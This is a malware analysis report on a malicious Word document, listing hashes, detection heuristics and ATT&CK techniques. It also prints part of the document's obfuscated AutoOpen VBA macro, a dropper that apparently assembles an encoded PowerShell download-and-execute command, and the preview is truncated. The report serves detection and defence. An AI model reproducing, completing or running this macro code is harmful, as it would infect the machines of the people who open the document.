Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 65db58efa397a4b2…

MALICIOUS

Office (OLE)

209.5 KB Created: 2018-06-27 05:34:00 Authoring application: Microsoft Office Word First seen: 2018-07-27
MD5: 861ff265263f145214a8e59e26dfd226 SHA-1: 053de2d30fe7bb2aec4c3db94e169a5b8a3d8ea7 SHA-256: 65db58efa397a4b279fd53643fb5e81cbf8cb75e583201b46f2a1b7dee2211fd
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call, indicating it is designed to execute arbitrary commands. The script concatenates strings to form what appears to be a command or URL, likely for downloading and executing a secondary payload. The ClamAV detection further supports its malicious nature.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6592983-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6592983-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10043 bytes
SHA-256: 217a7e926f39946bf18c53305e3702f51ee687148389da36ede559ab0a375575
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "kFlFHqORE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ibIYNUz"
Function QvNawscis()
On Error Resume Next
OaRiU = 86486
baiRQ = QBpvz
mkfQVK = Sin(19757)
TFhiVz = 8271
zWFlFt = CDate(9284)
XdWfz = 54363
DSVcnU = "Hell" + "  [" + "Stri" + "NG" + "]:" + ":JOI" + "n" + Chr(40) + "''," + Chr(40) + " '56W" + "84c"
Ekdza = 85388
TChZSt = MUMdiQ
lUEQup = Sin(22289)
sqiZA = 25569
okrwH = CDate(20366)
fdAMn = 42949
XZDwjfkzPSb = "85%1" + "19k33" + "N114U121" + "k107N49%" + "115~12" + "6Y11" + "8%1"
ZcPoKY = 13345
mmWmbL = zRjNaA
KMDFi = Sin(82475)
VrOzH = 34203
dYDkC = CDate(79161)
NkawR = 80135
EXtwVtm = "21%" + "127U104" + "N60U" + "82h121k1" + "04" + "W5" + "0}75}121" + "N126" + "c95k112" + "%117h"
UOXAqf = Sin(97023)
zNdAiQ = CDate(27214)
cIwJp = 67828
NLHRNR = HoTttp
aQtjkR = 29197
XOOAf = 89900
vBDvjfpXKRY = "121~" + "114~104" + "}39}56h" + "110k81" + "h75U33W" + "59}"
ZniawX = Sin(20682)
HvEwv = CDate(58200)
tCKGlK = 68400
bcfSqw = QiWTma
JwuVn = 72629
oAvJzF = 8603
LwttXKRYACR = "11" + "6~104k" + "104k" + "108c38U5" + "1k51k1" + "07}107" + "N10" + "7h50U46" + "W11" + "4N" + "12"
bpKzK = Sin(72513)
XAifq = CDate(50890)
fEzzWr = 94503
CbDvo = WhznMz
dnVPt = 70675
pFnkJl = 34898
sfLRWJDi = "0%111}1" + "27~" + "110N121}" + "121" + "h114%1" + "11h1"
DncCsi = Sin(12266)
JMvZlH = CDate(81173)
XzBwm = 88811
tBnPM = QKiuE
RjzhjZ = 75729
cznMHY = 89482
jdDYlsQ = "15" + "}127%117" + "~121W" + "104~1" + "01" + "N50~" + "127W" + "115" + "c1"
JWUUo = Sin(65195)
PXkqT = CDate(60466)
rMcRB = 85285
uocKWG = jrRhMW
llPXT = 66523
rULVJi = 52685
YAtircWBB = "13W5" + "1%77c" + "70k70W94" + "W51c92}" + "116Y104" + "c104c1"
nNHap = Sin(62666)
wXQCic = CDate(58115)
LiuNs = 65183
mGSqM = URpNX
HDuTC = 86697
iwFhL = 47489
RifGGRMuhU = "08Y38}" + "51h5" + "1%107Y1" + "07~1" + "07k5" + "0Y12" + "0~117U" + "114U1" + "23Y12" + "0~115"
XKsTmS = Sin(352)
YDwUT = CDate(81002)
JOXqf = 28542
qCliO = jYHRFQ
whWSFU = 41224
dKNFp = 72802
jOAOJBFzmU = "k114U1" + "23c120%1" + "15N123c1" + "04U" + "11" + "0W125W1"
jbAJE = Sin(21259)
tjHRl = CDate(69832)
wTwGs = 81087
bZFKjf = fsciJO
vMWOlo = 36463
sLvUl = 29301
fhjcaKrwM = "17c" + "114k117" + "U114" + "%123N5" + "0Y127N1" + "15c" + "113%51%" + "90h127%1" + "15~1" + "18c51k92"
QvNawscis = DSVcnU + XZDwjfkzPSb + EXtwVtm + vBDvjfpXKRY + LwttXKRYACR + sfLRWJDi + jdDYlsQ + YAtircWBB + RifGGRMuhU + jOAOJBFzmU + fhjcaKrwM
UHoHim = Sin(62376)
VNbfh = CDate(59043)
wQcVFD = 95334
CPiwc = jOJpzQ
Grojd = 62916
mqpGF = 91579
End Function
Function tflwoBDE()
On Error Resume Next
XWmJU = Sin(94007)
nNhzd = CDate(31048)
uCApiB = 30973
TbajI = ZopWj
STUwb = 79960
HIdXP = 51492
OWmrdV = "N116Y10" + "4%104" + "~108" + "U38W51k" + "51W107k1" + "07c1" + "07}5" + "0}11"
kYciqv = Sin(12407)
ANIMwc = CDate(29807)
BSDNP = 99368
dmvLk = LzCTi
jXEvlk = 38619
OnIiXz = 35763
znXlfN = "0h1" + "25W120Y1" + "17" + "~115Y117" + "~11" + "4h111c10" + "8U11" + "7%11" + "0%125~12" + "7N117W11" + "5k11"
kiNPiw = Sin(85330)
qcWwqz = CDate(87974)
prEvaC = 99907
luFdVD = LShbY
fvPkNU = 82523
nsmYd = 5878
kpUpGjXCQvj = "4}10" + "4~10" + "6~" + "50" + "W127c" + "115"
hZMZZt = Sin(51166)
rYutXX = CDate(59511)
TLqdzw = 27785
mRqYwB = FrAub
BqEqD = 20653
DGJKt = 56445
oUTJq = "~1" + "13~5" + "1N" + "117k84U1" + "22W7" + "9U75N" + "89k51c92" + "N116k104"
khuhwT = Sin(34059)
WrmJKq = CDate(40604)
VBqtOz = 8999
HwWjLh = EYiYS
vWJvqA = 52053
CrvYK = 27681
KhOtrOM = "}104" + "}108~3" + "8k5" + "1c5" + "1k107%1" + "07}107" + "W50k" + "113W11" + "5%115h" + "12"
pTRiS = Sin(63459)
cMYvhk = CDate(82540)
qTUEYU = 2801
AWqEFa = BSaUr
zMIZUS = 5561
puMhCw = 23578
KBhFqYPCUaE = "6W1" + "17k112}" + "121h" + "125N1" + "08c10" + "8Y50" + "h127"
DnTNT = Sin(44220)
dSWzw = CDate(79524)
CMWJr = 83921
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.